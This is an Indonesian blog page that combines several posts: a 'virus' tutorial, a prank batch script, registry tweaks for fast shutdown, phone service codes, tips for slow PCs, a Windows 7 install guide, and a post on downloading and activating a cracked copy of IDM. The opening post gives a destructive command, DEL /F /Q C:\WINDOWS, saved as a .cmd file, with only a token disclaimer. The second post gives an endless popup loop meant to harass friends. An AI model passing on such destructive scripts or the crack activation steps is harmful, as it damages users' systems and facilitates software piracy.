Sabtu, 19 Mei 2012

Cara membuat virus notepad hanya beberapa kata tapi sadis dan ganas



Sobatku sekalian!, sekarang kita mempelajari virus yang dapat menghapus system (kita mulai dari OS Windows aja ya!, nanti kalian kembangkan sendiri). 
langsung ke Step

Step :
1. buka aplikasi "Notepad",tau caranya khan?!

2. Tulis/Copy rumus dibawah ini!:

Code:
DEL /F /Q C:\WINDOWS
simple kan?

3. sekarang simpan dalam format .cmd, caranya : pada bagian "File nama" tulis virusganas.cmd dan "Save as type" pilih "All Files", visualisasinya:

4. klik "Save" deh!. Coba jalankan virus ini!, paling juga sekarang kalian harus nginstall ulang OS untuk komputer kalian. Hehe...

Note:
Artikel ini hanya sekedar tuk nambah wawasan qta.
segala penenyalah gunaan tidak di tanggung penulis 
kalau ada yang ngamuk ane
 Ngambek



Warning : Jangan digunakan terhadap komputer sendiri karena bisa berakibat FATAL


Quote:TUJUAN : perintah CMD untuk deleted System : C

Tutorial ngerjain teman dengan NotePad !!!

Ini Cuma Buat ngerjain teman sebaya atau di bawah umur kita jangan sampe ke orang yang lebih tua dari kita Nanti kita bisa bonyok wkwkw ngakak

1.Buka NotePad,  COPY SCRIPT DIBAWAH INI!!!

Code:
@ECHO off
:Begin
msg * kwkwkwkw!!!!
msg * ini hanya permainan guA
msg * ets jangan marah entar cepat tua loe
msg * guA cumA iseng doank!!
GOTO BEGIN

Tu pesannya bisa di tambah lagi ataupun Di editSombong 

2.Simpan File dgn ekstensi .bat dan Save type as nya AllFILES
CONTOH:
NamaFile.bat

Warning
Message
INGET JANGAN KE ORANG DEWASA BISA MARAH GEDE TUH 

INI SEKALI BUKA GA BISA DI TUTUP HARUS DI RESTAR OM 
ngakakDj


SELAMAT MENCOBA!! 

Tips & Trick Teknik Super Cepat Shutdown Windows

Proses Shutdown windows terkadang bisa memakan waktu cukup lama, apalagi setelah selesai menggunakan berbagai aplikasi, ada aplikasi yang hang dan lainnya. Hal ini sering menjengkelkan, apalagi sebagian kita ingin segera meninggalkan meja segera setelah PC mati. Bagaimana agar proses Shutdown ini lebih cepat ?

Ada beberapa teknik yang bisa digunakan untuk mempercepat proses Shutdown windows, mulai dari cara yang normal/wajar sampai yang tidak wajar. Sehingga kita bisa shutdown windows kurang dari 5 detik atau bahkan hanya sekitar 2 detik, tanpa memerlukan software tambahan.

Cara Normal

Cara normal adalah dengan memodifikasi Registry windows, yaitu semua hal yang berhubungan dengan proses Shutdown windows. Sebaiknya sebelum memodifikasi registry windows, maka lakukan backup ( dengan memilih menu File > Export ketika sudah masuk Windows Registry Editor ). Berikut cara dan penjelasannya :

Sebelumnya, buka terlebih dahulu Windows Registry Editor ( Menu All Programs > Run ) ketikkan regedit lalu Enter atau klik OK.

[Image: open-regedit.jpg]

Setelah Windows Registry Editor terbuka, bisa diikuti penjelasan dan langkah-langkah berikut :

Otomatis menutup (Auto Kill) semua Aplikasi pada saat Shutdown
Cari key berikut : HKEY_CURRENT_USER\Control Panel\Desktop, kemudian temukan Key AutoEndTasks klik kanan, pilih Modify dan jika nilainya bukan 1 maka ganti dengan nilai 1.
Mengubah waktu Hang Aplikasi.
masih di Key yang sama (HKEY_CURRENT_USER\Control Panel\Desktop), cari Key WaitToKillApp, HungAppTime, dan WaitToKillServiceTimeout. Klik kanan masing-masing key tersebut dan pilih Modify, ganti isinya dengan nilai 1000.
Men-non aktifkan fasilitas Clearing Paging File
Pada waktu shutdown, windows otomatis menghapus isi Paging File untuk keamanan, karena kemungkinan paging file ini digunakan untuk temporary file, berisi user atau password dan sebagainya. Jika kita tidak terlalu khawatir dengan masalah keamanan tersebut, maka fasilitas windows ini bisa di non aktifkan untuk mempercepat proses shutdown.

Caranya cari key berikut di Registry Editor: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management, kemudian cari key ClearPageFileOnShutdown dan klik kanan, pilih modify, ganti isinya dengan nilai 0.

Dengan mengubah beberapa setting tersebut, maka seharusnya proses shutdown akan berlangsung lebih cepat dari biasanya, terutama jika ada aplikasi yang sering hang ketika shutdown. Jika tidak ingin repot-repot dengan langkah diatas, copy paste text berikut, kemudian simpan dengan nama file yang berekstensi .reg ( misalnya : fastshutdown.reg ). Setelah itu jalankan file itu ( double click ), ketika muncul konfirmai, tekan Yes.

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Control Panel\Desktop]
"WaitToKillServiceTimeout"="1000"
"AutoEndTasks"="1"
"HungAppTimeout"="1000"
"WaitToKillAppTimeout"="1000"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"ClearPageFileAtShutdown"=dword:00000000

Jika menyimpan dengan notepad, pilih Save as kemudian bagian Save as type pilih All files, ketika menyimpan beri tanda petik, misalnya “fastshutdown.reg”

Cara lain Shutdown Super Cepat

Jika cara diatas masih terlalu lama, dan ingin cara super cepat, maka gunakan tip berikut :

Buka Task Manager (tekan Ctrl+Alt+Del)
Tahan tombol Ctrl sambil klik Menu Shutdown > Turn Off

[Image: fast-shutdown.jpg]

Maka Komputer akan segera mati dalam sekejap.

Sebelum menggunakan cara ini pastikan data-data sudah di simpan, karena jika belum disimpan maka data-data dapat hilang. Selain itu gunakan cara ini jika keadaan mendesak saja, karena kemungkinan bisa menyebabkan ada file yang corrupt, meskipun ini jarang terjadi

Cara Lainnya lagi ?

Cara lainnya, adalah dengan shortcut melalui keyboard, tanpa Mouse, yaitu dengan menekan tombol Windows (Win) Kemudian menekan huruf U lalu U. Singkatnya Win+U+U atau bisa juga Win+U+Enter. Untuk mempercepat proses shutdown juga bisa dilakukan dengan mematikan sound ketika Exit Windows.

Kode Rahasia Handphone China, LENGKAP!!

Diakui atau tidak, handphone-handphone yang membanjiri Indonesia saat ini adalah dari China, apapun merknya, bahkan handphone yang berlabel "yang sudah matang" sekalipun sebelumnya, kini dengan mudah kita dapatkan dengan versi china atau replika, tentu dengan harga yang relatif murah dengan spesifikasi yang relatif canggih juga, seperti yang saya miliki cross cb99,,wuhh mantap banget, namun, ada yang kurang saya rasakan bila memiliki handphone china tanpa mengetahui kode-kode rahasia/default/standar dari hanphone tersebut, terlebih lagi Anda yang saat ini lagi diberi Amanah oleh Tuhan untuk mengelolah usaha jasa service hanphone, Wajib bukan???

Nah... lansung saja saya membagi kepada Anda mengenai kode-kode rahasia/standar dari hanphone tersebut, yang katanya sulit diketahui, bahkan bertanya pada ahli service hanphonepun terkadang info yang diberikan tidak sesuai dengan apa yang kita inginkan. Berikut kode-kode tersebut :


'Chinese Model'
Quote:Chinese Models
* Default user code: 1122, 3344, 1234, 5678
* Engineer mode: * # 110 * 01 #
* Pabrik mode: * # 987 #
* COM Aktifkan PORT * # 110 * 01 # – Device> – UART Set> -> PS Config -> ART1/115200
* Kembali ke pengaturan pabrik: * # 987 * 99 #
* LCD kontras: * # 369 #
* versi software: * # 800 #
* versi software: * # 900 #
* mengatur bahasa default: * # 0000 # Kirim
* Bahasa set BAHASA INGGRIS: * # 0044 # Kirim
* menetapkan bahasa Inggris (firmware baru): * # 001 # SendService kode BenQ:
* versi software: * # 300 #
* tes mode: * # 302 * 20040615 #
'layanan code pantech'
Quote:Layanan kode Pantech:
* SOFTWARE VERSI: * 01763 * 79837 #
* service menu: * 01763 * 476 #
* reset default (telepon / kode pengguna reset ke default): * 01763 * 737381 #
* Layanan kode 3xx, 5xx:
* versi software: * # 79 #
* versi software: * # 837 #
Layanan kode VK200, VK2000, VK2010, VK2020, VK4000:
* versi software: * # 79 #
* SERVICE MENU: * # 9998 * 8336 # (terus #)
* default reset (telepon / kode pengguna reset ke default): * # 9998 * 7328 # (terus #)
'code layanan LG'
Quote:kode Layanan LG:
* versi software: 2945 # * #
Layanan codes Fly:
* 2040 (i) reset defaults: * # 987 * 99 # Kirim
* MX200 reset defaults: * # 987 * 99 # Kirim
* MX200 software version: * # 900 # Kirim
* SL300m reset defaults: * # 987 * 99 # Kirim
* SL300m versi software: * # 900 # Kirim
* SL500m reset defaults: * # 987 * 99 # Kirim
* SL500m versi software: * # 900 # Kirim
* MP500 reset defaults: * # 987 * 99 # Kirim
* MP500 versi software: * # 900 # Kirim
* Menetapkan bahasa ke Bahasa Inggris: * # 0044 #
* Atur bahasa Rusia: * # 0007 #
kode Layanan Konka:
* C926 versi software: * 320 # Kirim
* C926 menetapkan bahasa default: * # 0000 # Kirim
* C926 menetapkan bahasa Inggris: * # 0044 # Kirim
'code layanan G-Star'
Quote:kode Layanan GSTAR:
* GM208 (Cina Nokea 6230 +) engineering menu: * # 66 * #
* Menetapkan bahasa ke Bahasa Inggris: * # 0044 #
* Atur bahasa Rusia: * # 0007 #
* GM208 (Cina Nokea 6230 +) engineering menu: * # 66 * #
* Menetapkan bahasa ke Bahasa Inggris: * # 0044 #
* Atur bahasa Rusia: * # 0007 #
kode Layanan Motofone-F3:
* Motofone perangkat lunak versi F3: ** 9999 * Kirim
* *** 300 * Set SIM Pin
* *** 310 * / *** 311 * Pin SIM ON | OFF
* *** 000 * Reset P’aturan pabrik
* *** 644 * Set Voicemail nomor
* *** 260 * / *** 261 Auto * tombol lock ON | OFF
* *** 510 * / *** 511 suara * Buatlah ON | MATI
* *** 160 * / *** 161 * Restricted Calling (Phonebook only) ON | OFF
* *** 200608 * Send: versi perangkat lunak
* *** 200606 * Send: software versi
* *** 200806 * Send: versi rakelmartins
* *** 250 * / *** 251 * nada tombol ON | OFF
* *** 470 * Pilih format waktu
* *** 500 * / *** 501 * Prepaid Balance Display ON | OFF
* *** 520 * Ubah bahasa
Layanan kode VK-Mobile 3xx, 5xx:
* versi software: * # 79 #
* versi software: * # 837 #
* layanan menu: * # 364 * 85 # (tahan #)
Layanan kode VK200, VK2000, VK2010, VK2020, VK4000:
* versi software: * # 79 #
* service menu: * # 9998 * 8336 # (terus #)
* default reset (telepon / kode pengguna reset ke default): * # 9998 * 7328 # (terus #)
'code layanan china pabrik'
Quote:kode Layanan “Cina” model:
default user code: 1122, 3344, 1234, 5.678
Engineer mode: * # 110 * 01 #
Pabrik mode: * # 987 #
Aktifkan COM port: * # 110 * 01 # – Device> -> Set UART -> PS Config -> UART1/115200
Kembali ke pengaturan pabrik: * # 987 * 99 #
LCD kontras: * # 369 #
versi software: * # 800 #
versi software: * # 900 #
Layanan kode BenQ:
versi software: * # 300 #
tes mode: * # 302 * 20040615 #


'versi software'
Quote:versi software: * # 300 #
tes mode: * # 302 * 20040615 #
Layanan kode Pantech:
versi software: * 01763 * 79837 #
service menu: * 01763 * 476 #
reset default (telepon / kode pengguna reset ke default): * 01763 * 737381 #
Layanan kode 3xx, 5xx:
versi software: * # 79 #
versi software: * # 837 #
Layanan kode VK200, VK2000, VK2010, VK2020, VK4000:
versi software: * # 79 #
service menu: * # 9998 * 8336 # (terus #)
default reset (telepon / kode pengguna reset ke default): * # 9998 * 7328 # (terus #)
Layanan codes Fly:
2040 (i) reset defaults: * # 987 * 99 # Kirim
MX200 reset defaults: * # 987 * 99 # Kirim
MX200 software version: * # 900 # Kirim
SL300m reset defaults: * # 987 * 99 # Kirim
SL300m versi software: * # 900 # Kirim
SL500m reset defaults: * # 987 * 99 # Kirim
SL500m versi software: * # 900 # Kirim
MP500 reset defaults: * # 987 * 99 # Kirim
MP500 versi software: * # 900 # Kirim
Menetapkan bahasa ke Bahasa Inggris: * # 0044 #
Atur bahasa Rusia: * # 0007 #
kode Layanan Konka:
C926 versi software: * 320 # Kirim
C926 menetapkan bahasa default: * # 0000 # Kirim
C926 menetapkan bahasa Inggris: * # 0044 # Kirim
kode Layanan GSTAR:
GM208 (Cina Nokea 6230 +) engineering menu: * # 66 * #
Menetapkan bahasa ke Bahasa Inggris: * # 0044 #
Atur bahasa Rusia: * # 0007 #
Motofone perangkat lunak versi F3: ** 9999 * Kirim
C113, C114, C115, C115i, C116, C117, C118 software version: # 02 # *
C138, C139, C140 software version: * # 02 #
C155, C156, C157 versi software: * # 02 #
C257, C261 software version: # 02 # *
V171, V172, V173 software version: # 02 # *
V175, V176, V176 versi software: * # 02 #
C168, W220 software version: * # ** 837 #
W208, W375 software version: * # 02 #
ZTE Mobile1-* 938 * 737381 #
2 – TELEPON AKAN DIPLAYED DIBUAT
3 – POWER OFF TELEPON ANDA DAN POWER ON LAGI
alcatelE205
unlocking kode telepon, tekan hanya *** 847 # tanpa simcardE900 versi software: * # 5002 * 8376263 #
E900 penuh reset: * 2767 * 3855 #
kode Layanan Spice:
S404 mengaktifkan port COM: * # 42253646633 # – Device> -> Set UART -> PS -> UART1/115200
S410 engineer mode: * # 3646633 #
S900 software version: * # 8375 #
S900 serial no: * # 33778 #
Layanan kode Philips:
$ 200 mengaktifkan port COM: * # 3338913 # – Device> -> Set UART -> PS -> UART1/115200

Berbagai Macam Penyebab Komputer Lambat dan Solusinya

Komputer kamu makin lama makin lambat / lelet / lemot seiring dengan waktu kamu menggunakannya?? Hal ini pastinya sangat menjengkelkan apalagi kita termasuk orang yang sehari-harinya tidak pernah lepas dari PC / Laptop untuk mendukung segala rutinitas pekerjaan kita. Baik itu bekerja untuk kantor, tugas-tugas ataupun aktifitas yang mengharuskan online di internet. Komputer lemot pada dasarnya bisa jadi karena pengguna kurang memahami dalam mensetting dan memaintenance komputer secara optimal. Bila pada postingan sebelumnya saya menulis tentang Penyebab Komputer Restart Sendiri dan Solusinya, maka pada artikel kali ini akan dipaparkan berbagai macam penyebab komputer berjalan lambat berikut solusi / cara untuk mengatasinya. Artikel kali ini khusus diperuntukkan bagi pemula dan tingkat menengah. Hehe.., jadi apabila anda kebetulan tingkat mahir yang kebetulan pula mampir dan sesekali cengar-cengir membacanya, sekalian saya mohon petunjuk, masukan serta koreksinya. Peace om..!! 

Dari sisi hardware : 

1. Processor yang terlalu panas - Prosessor yang terlalu panas biasanya karena kurang mendapat pendinginan yang baik sehingga dapat menyebabkan lambatnya kinerja system itu sendiri. Solusi : Kebersihan bagian hardware perlu mendapatkan perhatian khusus. Jangan hanya bisa menggunakan tanpa merawat daleman komputer, karena bagian-bagian tersebut yang menyebabkan komputer dapat bekerja dengan baik. Lakukan pembersihan secara berkala pada bagian dalam komputer dari debu, kotoran dll. Bersihkan dengan kuas yang tidak terlalu keras, bersihkan prosessor beserta kipas dan komponen lain. Perhatiakan pula exhaust fan dan ventilasi agar tidak tertutup sehingga sirkulasi udara berjalan baik. 

2. Memory (RAM) yang karena terlampau kecil sehingga tidak mampu mendukung performa system - Memory yang terlampau kecil sangat mempengaruhi kinerja system komputer secara keseluruhan. Lambatnya komputer saat membuka dan menjalankan beberapa program pada saat bersamaan merupakan salah satu indikator memory yang kurang. Solusi : Tambahkan/upgrade memory menjadi lebih besar sehingga akan meningkatkan kecepatan komputer. Dari sisi software : 
1. Operating System (OS) dan Program terinstal tidak kompatibel dengan hardware - OS harus sesuai dengan kemampuan hardware, begitu pula program yang akan diinstal haruslah kompatibel dengan OS itu sendiri. 

Solusi : - OS harus sesuai dengan kemampuan hardware, begitu pula program yang akan diinstal haruslah kompatibe. Gunakanlah OS dengan versi yang sesuai dengan spesifikasi komputer. Sebagai contoh jangan menginstal Windows Vista pada pentium II. 

- Bila mendownload aplikasi, terlebih dahulu perhatikan minimum system yang harus dimiliki komputer, seperti minimum processor, memory, kapasitas hard disk minimum yang harus tersedia, serta versi Windows yang kompatibel sebelum menginstalnya pada komputer kamu. 

Tips : bagi kamu yang pemula biasakan membaca minimum system requirements (persyaratan sistem minimum) yang tertera pada cover CD/DVD program (atau biasanya ditemukan pada "read me" di dalam CD) maupun membaca petunjuk pada situs resmi pembuat software. 2. Visual Effect yang mempengaruhi performa system – Visualisasi dan tampilan desktop Windows secara default memang menggunakan themes yang menarik dan membuat tampilan desktop menjadi lebih keren. Tapi tahukah kamu sebenarnya themes tersebut akan mempengaruhi kecepatan komputer? 

Solusi : Untuk membantu mempercepat kinerja system, disarankan untuk mensetting visualisasi tampilan secara minimum dan memilih Theme Classic. Caranya : - Klik kanan My Computer -- > Klik Properties --> Klik Advanced System Settings 


- Akan muncul System Properties --> pilih tab Advanced (untuk windows XP, saat klik properties akan langsung masuk ke System Properties). 

[Image: system.jpg]

- Pada tab Advanced, klik tombol Setting pada bagian Performance. 

[Image: adjust.jpg]

- Akan muncul Performance Options, pilih tab Visual Effects, lanjutkan dengan klik Adjust for Best Performance --> OK.

[Image: adjust+best.jpg]

- Untuk mengubah menjadi theme classic klik kanan pada bidang desktop Windows 7 kamu. Kemudian pilih Personalize. Dari daftar Theme yang tampil, di bagian Basic and High Contrast Themes, pilih theme Windows Classic.

[Image: image_0760AD48.png]

3. Terlalu banyak aplikasi program yang ikut dipanggil pada saat startup sehingga akan memperlambat proses ketika menyalakan komputer pertama kali. - Hal ini disebabkan karena pada saat kita menginstal suatu program, tidak membaca dengan cermat proses instalasi, sehingga terbiasa meng-klik "Next". Sebenarnya pada step by step proses instalasi ditanyakan apakah program tersebut diikutkan pada saat startup atau tidak. Padahal belum tentu kita pasti memerlukannya setiap kali menggunakan komputer bukan? Solusi : Mendisable startup yang tidak perlu pada Startup System Configuration. Caranya : 

- Pada Start Menu Windows klik Run (atau tekan tombol icon Windows + R), ketikkan msconfig --> Enter. - Cari tab Startup, hilangkan centang semua program yang tidak diinginkan saat startup, kecuali program antivirus. - Klik Apply, Ok, restart komputer. Sebenarnya, artikel khusus untuk mempercepat start-up windows juga sudah pernah dituliskan, untuk melihat secara detail beserta gambar, silahkan baca di "Mempercepat Start-up Windows" 4. Drive tempat dimana Windows terinstal terlampau penuh - Akibatnya tidak cukup ruang pada hard disk untuk virtual memory sehingga komputer terasa lemot ketika menjalankan banyak aplikasi. 

Solusi : Drive tempat instalasi windows (misal drive C:/) harus disisakan minimal 12 % dari kapasitas hard drive. Simpanlah data-data pada hard disk selain drive C:/. Usahakan C:/ hanya untuk menginstall program-program. Sistem operasi Windows menggunakan dua memori. Utamanya, Windows menggunakan RAM alias memori utama. Apabila memori utama telah habis dipakai, maka Windows akan membuat memori virtual yang diambil dari sisa kapasitas hard disk. 

5. Terlalu banyak program terinstall sehingga total hardisk kepenuhan - Prioritaskan hanya menginstall program penting yang sering digunakan dan sebaiknya menyimpan data pada eksternal hard disk apabila kapasitas hard disk tidak memadai (berhubungan dengan point sebelumnya) Solusi : - Uninstall program yang tidak perlu. - Nonaktifkan program bawaan windows yang tidak perlu dan tidak pernah digunakan karena program tersebut hanya akan memenuhi ruang hardisk. Caranya, masuk control panel, klik Add/Remove Windows Component. Cari program yang tidak perlu dan digunakan, misalnya game internet, MSN messenger, calculator, Internet Explorer (apabila lebih menyukai browser lain) dll. - Hapus file sampah seperti temporary file, missing shortcut dan file-file pada recycle bin. Pastikan file yang memang tidak terpakai yang akan dihapus dari Recycle Bin. (untuk membersihkan file-file ini bisa menggunakan Tune Up Utilities, sudah pernah dituliskan disini). - Bila ingin membuat agar komputer kamu dengan Office versi lama (Ms. Office 2003 dan sebelumnya) bisa membuka Office versi 2007 docx, pptx, xlsx, tapi hardisk kamu kebetulan menyisakan sedikit ruang tersedia, bisa menginstal converter dari microsoft. Artikelnya sudah pernah ditulis di blog ini beserta link downloadnya di sini. 

6. Management file pada hard disk yang tidak teratur - Kebiasaan menempatkan file-file secara sembarangan dan proses hapus-tulis (copy sana-sini, pindah sana-sini) akan mempengaruhi kinerja system secara keseluruhan. Solusi : Defragment drive hard disk secara berkala (minimal 3 bulan sekali) tergantung pada pemakaian, kebiasaan proses hapus tulis dan kegiatan instal-uninstall program pada komputer. Disk Defragmenter adalah utility Windows yang mengkonsolidasikan file yang mengalami fragmentasi di dalam hard disk komputer sehingga masing-masing file tersebut menempati suatu space tunggal didalam hard disk. Dengan file yang tersimpan rapi ujung ke ujung tanpa mengalami fragmentasi, maka akan dipastikan bahwa proses pembacaan dan penulisan file menjadi lebih cepat. Caranya : Klik Start --> All Programs --> Accessories --> System Tools --> Disk Defragmenter. Pada kotak dialog Disk Defragmenter, klik Drive yang ingin dilakukan Defragment dan klik tombol Analyze. Setelah disk dianalisa, maka kotak dialog muncul untuk mengkonfirmasikan bahwa kamu akan melakukan proses defragmentasi drive. Windows akan memberitahukan pada kita apakah drive perlu di defragment atau tidak. Biasanya akan memerlukan waktu yang lama, maka dari itu pilih saat kamu santai dan sedang tidak memerlukan menggunakan komputer untuk bekerja. 

7. Terlalu banyak membuka program – Nah penyebab ini yang paling parah, kebanyakan pengguna masih melakukan hal ini tanpa menyadarinya. Memaksakan membuka aplikasi berlebihan padahal RAM pas-pasan serta kapasitas sisa ruang hardisk sangat sedikit jelas-jelas memperlambat system keseluruhan. Solusi : Matikan aplikasi yang kiranya tidak diperlukan atau sementara dapat ditunda. Misalnya mengalah pada diri sendiri untuk mematikan winamp ketika sedang menjalankan aplikasi yang membutuhkan memory besar seperti aplikasi grafis adalah tindakan bijaksana. 

8. Komputer terjangkit virus - virus pada system sangat mempengaruhi kinerja system dan otomatis memperlambat system secara keselurahan. Solusi : Instal antivirus adalah wajib hukumnya dan harus dipastikan antivirus selalu terupdate. Lebih baik mencegah daripada memberangus setelah virus menyebar. Carilah referensi mengenai antivirus yang ringan dan sesuai untuk spesifikasi komputer kamu. 

9. Error pada program - biasanya terjadi pada program yang pada saat dijalankan, komputer tiba-tiba mati atau pada saat instalasi terdapat file-file corrupt. Solusi : Repair atau install ulang program dapat mengatasi masalah ini. Tips mengatasi komputer lambat untuk yang sering/selalu terhubung dengan koneksi internet : Browsinglah secara efisien & efektif dengan membuka link pada Tab baru. Caranya klik kanan link yang akan dibrowse, kemudian klik Open in New Tab. Meskipun demikian jangan terlalu berlebihan browsing dengan membuka banyak tab, tutuplah tab yang telah selesai dibaca atau tak diperlukan lagi. Terlalu banyak membuka Jendela Browser pada waktu browsing dapat mengakibatkan komputer melambat. Hapus temporary internet files secara berkala. Matikan automatic update dari windows. (Update sewaktu-waktu secara manual pada saat waktu luang, akan tetapi bila Windows kamu adalah bajakan jangan melakukan update). Matikan automatic update dari program yang memerlukan update. Namun lakukan update secara manual, karena biar bagaimanapun update akan penting untuk penyempurnaan program dan mengatasi error. Apabila koneksi komputer kamu tidak stabil, lakukan update saat koneksi internet lancar.

Download IDM 611 Full Crack Full serial

 

Internet Download Manager atau biasa disingkat IDM , adalah perangkat lunak yang mampumengunduh data-data yang ada di internet dan meneruskan kembali. Perangkat buatan New York, Amerika ini menempati posisi teratas dalam memaksimalkan kecepatan mengunduh data. Tampilan dan grafis yang sederhana membuat IDM lebih bersahabat dengan penggunanya.


Fitur-fitur

  • Mendukung Semua Peramban Populer dan Aplikasi
  • Kemudahan Mengunduh dengan Satu Klik
  • Pengambil video YouTube
  • Pengecekan Virus Otomatis
  • Seret dan Drop 
  • IDM Mendukung Banyak Jenis Layanan ProksiMultibahasa 
  • Sistem Kategori 
  • Melanjutkan Berkas Unduhan yang Gagal 
  • Sistem Instalasi Sederhana 
  • Penjadwalan 
  • Advanced Browser Integration 
  • IDM Mendukung Protokol Otentikasi Utama: Basic, Negotiate, NTLM, dan Keberos 
  • Tampilan yang dapat disesuaiakan 
  • Fitur Mutakhir Cepat

Cara aktivasi IDM 6.11 Build 10 :
  1. Download dan install IDM.
  2. Exit IDM yang berada di system tray.
  3. Copy file crack IDM, kemudian paste di mana anda menginstal IDM. Misal C:\Program files\Internet download manager.
  4. Klik 2x RegKey.reg.
  5. Done! Kini IDM sudah full kembali.



Cara Menginstall Windows 7 Langkah demilangkahnya untuk pemula

Selamat malam sahabat , kali ini saya akan memberikan sedikit informasi atau sedikit cara dan langkahmenginstall Operating System untuk Windows 7.
Kenapa saya membahas tentang artikel ini ? dikarenakan ada seorang kerabat yang belum tahu sama sekali cara menginstall Windows 7 , dan apabila beliau menggunakan Jasa Teknisi Komputer harus membayar puluhan ribu rupiah hanya untuk sekedar memnginstall Operating System yang kurang dari 1 Jam ini. dan saya dulu juga pernah memberikan sedikit tutorial untuk menginstall Windows XP melalui Flashdisk.
Windows 7 adalah sebuah Operating System penerus dari Windows XP dan walaupun sudah launch di tahun 2007 , akan tetapi masih banyak Vendor yang menyarankan Windows 7 untuk persangkay komputer konsumen , dan kali ini apa salahnya saya memberikan sedikit tutorial bagi yang awam dengan yang namanya meng-Install Operating System Windows 7.

Beberapa syarat juga harus dipenuhi dalam menginstall Windows 7 ini , salah satunya adalah harus ada komputernya loh ya :lol: , dan mempunyai DVD Windows 7 , setidaknya :) .

Syarat selanjutnya adalah , untuk masalah Memory atau bisa saya sebut RAM minimal mempunyai kapasitas 1GB atau 1024 MB ,untuk hasil yang sempurna dan mempunyai Hardisk dengan ruang kosong diatas 20 GB untuk menginstall System Windows ini. dan saya sarankan saja minimal 40GB Hardisk Free Diskspace :) .
Langsung saja ke langkah – langkah nya :D
  1. Siapkan DVD Master Windows 7 ( ultimate , Basic , Starter dll ) , dan hidupkan komputer serta Masuk ke Bios komputer sahabat , sembari masukkan pula DVD Windows 7 anda ke DVD Rom komputer sahabat. , untuk masuk ke Bios biasanya waktu pertama menghidupkan Komputer terdapat Start Up , sahabat bisa mengaksesnya dengan menekan tombol “DEL” atau apabila di LAPTOP / Notebook dan semacamnya dengan menekan tombol “F2″ ( tergantung Hardware dan komputernya juga  :P )
  2. Setalah masuk BIOS Setting , pilih di menu Boot , seperti dibawah ini lah setidaknya ( untuk setiap komputer berbeda – beda ) dan set First Priority Bootnya ke DVD Rom atau ke HardWarediaman sahabat memasukkan DVD Master Windows 7 sahabat.
    Bios Setting
    Setting Boot Priority
  3. Setelah itu Tekan “F10” atau Exit / simpan dan restart secara otomatis, lalu biarkan berjalan maka nanti akan muncul berupa perintah , tekan sembarang tombol untuk boot melalui CD / DVD :P hehehe .. maka apabila Booting Melalui DVDakan muncul layar seperti Berikut ini :
    Menunggu setup
    Boot CD Loading Setup
  4. Biarkan dahulu sampai muncul halaman seperti berikut ini
    Windows Begin
    Starting Windows
    tampilan diatas berarti Windows 7 sudah mulai bekerja :P hehehe ..
  5. Tunggu sesaat hingga nanti muncul halaman pula seperti berikut ini , dan disinilah kita mulai langkah – langkah yang teramat sangat mudah untuk menginstall Windows 7 :D
    Setup Installing Windows
    Setup Installing Windows
    nah sekarang tinggal setting menurut apa yang sahabat mau , tentukan sendiri pilihan utuk bahasa yang akan diinstall , waktu dan keyboards input .
    kalau saya menyarankan , “english >> Indonesia >> US ” :lol: , lalu klik “Next
  6. Apabila sudah sahabat lewati langkah diatas maka , akan berubah tampilan sebagai berikut.
    Begin Installing
    Memulai Penginstallan
    Dan selanjutnya klik “Install Now ” untuk menginstall Windows 7.
  7. Selanjutnya sahabat akan dibawa ke sebuah halaman dimana sahabat mau menyetujui ketentuan dan lisensi  yang berlaku , tinggal centang “accept .. bla bla bla ” , lalu klik “Next ” lagi .
    persetujuan kesepakatan lisensi
    centang I accept
  8. Setelah sahabat klik Next maka sahabat akan diberikan 2 Pilihan yaitu Upgrade atau Custom , dimana Upgrade adalah untuk meng- Upgrade Windows Versi sebelumnya ke windows Master DVD sahabat dan Custom adalah menginstall Ulang keseluruhan system operasi.
    Pilih ” Custom “ 
    Install atau Upgrade
    Pilih Custom Untuk Install
  9. Maka Sahabat akan disuguhi dengan sebuah halaman pemilihan Partisi , apabila sebelumnya komputer sahabat telah terisi Opertaing system dan Drive lain adalah penyimpanan data sahabaty , maka pilih Drive yang diaman Drive tersebut adalah drive System Operasi sahabat. Dan apabila belum pernah terisi apapun saya menyarankan untuk membuat Partisi Baru , yaitu dengan mengklik Tombol New .
    partisi install
    partisi
    Partisi Windows
    Partisi Windows 7
  10. Setalh rampung membuat Partisi Hardsik dari Windows anda lalu pilih Drive yang akan anda jadikan sebagai Drive System ,, lalu klik Next. , maka Proses Instalasi pun akan mulai berjalan .
    Memulai Installasi
    installasi

  11. Biarkan hingga selesai dan komputer anda akan ter-Restart .. Setelah proses Restartmaka Windows akan melanjutkan proses Installasi FIle dan program yang telah teregistrasi sebelumnya :
    Installasi
    Installasi
  12. Biarkan sampai selesai , dan komputer sahabat akan tersetart kembali , karena setalh terestart disinilah langkah terakhir pengintsallan windows nanti :
    pemakaian pertama kali
    setup

  13. Setelah proses Setup , maka sahabat akan menemui halaman penamaan komputer dan User .
    user komputer
    Nama System
    isikan nama komputer system sahabat , lalu tekan Next
  14. Setelah itu akan tampil halaman baru dimana sahabat diberikan kesempatan untuk memberikan password pada komputer sahabat , apabila tidak ingin memberikan password untuk Windowssahabat langsung saja klik “next”
    Password
    masukkan password atau kosongi
  15. Next kembali , dan sahabat akan menemukan halaman aktivasi untuk memasukkan serial number atau product key windows 7 , kosongkan dan hilangkan centang pada pilihan “Automatically activated windows when I’am Online ” ,
    aktivasi windows seven
    aktivasi
  16. Klik Next , dan sahabat akan diberikan halaman baru lagi disini sahabat akan diberikan pilihan , melakukan update secara automatis ataukah tidak , seperti itulah intinya dan kalau bisa jangan aktifkan Updatenya.
    automatic update
    pilih ask me later
  17. Setelah memilih maka sahabat akan disuguhi dengan halaman dimana menentukan wilayah waktu sahabat .
    Wilayah waktu
    tentukan wilayah waktu dan jam
  18. Klik Next dan sahabat akan dibawa lagi ke halaman menentukan Jaringan ( apabila Komputer anda terkoneksi ke jaringan ) , pilih sesuai dengan kebutuhan sahabat, tapi saya menyarankan memilih “public Network apabila komputer sahabat sering dipakai di tempat umum , akan tetapi kalau komputer rumahan saja pilih home Network.
    pilihan jaringan
    pilihan jaringan koneksi
  19. Nah sekarang adalah menuju langkah langkah akhir penginstallan Windows , setelah sahabat memilih jaringan maka system akan memulai proses installasi program . seperti gambar berikut:
    menginstall windows
    finalizing installation
  20. Dan setelah installasi terakhir sebelumnya maka akan disuguhi halaman wellcome Screen  Windows 7 ,
    Wellcome Screen
    Wellcome Screen
  21. Setelah itu Windows 7 telah sempurna terinstall di Komputer sahabat .
